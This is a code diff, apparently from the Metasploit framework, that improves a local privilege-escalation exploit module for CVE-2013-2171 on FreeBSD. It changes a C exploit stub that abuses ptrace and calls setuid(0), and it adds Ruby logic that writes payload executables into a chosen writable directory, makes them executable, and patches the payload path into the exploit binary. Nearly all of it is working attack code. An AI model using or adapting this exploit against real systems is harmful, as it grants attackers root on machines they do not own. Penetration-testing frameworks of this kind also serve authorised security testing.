Land #2023 - Improve CVE-2013-2171
commit
97ab9fa8df
Binary file not shown.
|
@ -17,7 +17,7 @@ int main(int ac, char **av) {
|
|||
struct ptrace_io_desc piod;
|
||||
char *s, *d;
|
||||
int pid;
|
||||
char *bin = "/tmp/W00T"; // "W00T" is just a place holder
|
||||
char *bin = "MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890"; // is just a place holder
|
||||
|
||||
if (geteuid() == 0) {
|
||||
setuid(0);
|
||||
|
|
|
@ -12,6 +12,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::Common
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
|
@ -49,6 +50,11 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'DisclosureDate' => "Jun 18 2013",
|
||||
}
|
||||
))
|
||||
register_options([
|
||||
# It isn't OptPath becuase it's a *remote* path
|
||||
OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -58,7 +64,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def write_file(data, fname)
|
||||
def write_file(fname, data)
|
||||
oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
|
||||
session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
|
||||
session.shell_command_token("chmod +x #{fname}")
|
||||
|
@ -67,10 +73,17 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
return (chk =~ /ERROR: cannot open/) ? false : true
|
||||
end
|
||||
|
||||
|
||||
def upload_payload
|
||||
fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
|
||||
fname = datastore['WritableDir']
|
||||
fname = "#{fname}/" unless fname =~ %r'/$'
|
||||
if fname.length > 36
|
||||
fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters")
|
||||
end
|
||||
fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}"
|
||||
|
||||
p = generate_payload_exe
|
||||
f = write_file(p, fname)
|
||||
f = write_file(fname, p)
|
||||
return nil if not f
|
||||
fname
|
||||
end
|
||||
|
@ -80,17 +93,14 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
# Metasm does not support FreeBSD executable generation.
|
||||
#
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
|
||||
f = File.open(path, 'rb')
|
||||
x = f.read(f.stat.size)
|
||||
f.close
|
||||
|
||||
x.gsub(/W00T/, File.basename(payload_fname))
|
||||
x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
|
||||
x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
|
||||
end
|
||||
|
||||
def upload_exploit(payload_fname)
|
||||
fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
|
||||
fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
|
||||
bin = generate_exploit(payload_fname)
|
||||
f = write_file(bin, fname)
|
||||
f = write_file(fname, bin)
|
||||
return nil if not f
|
||||
fname
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue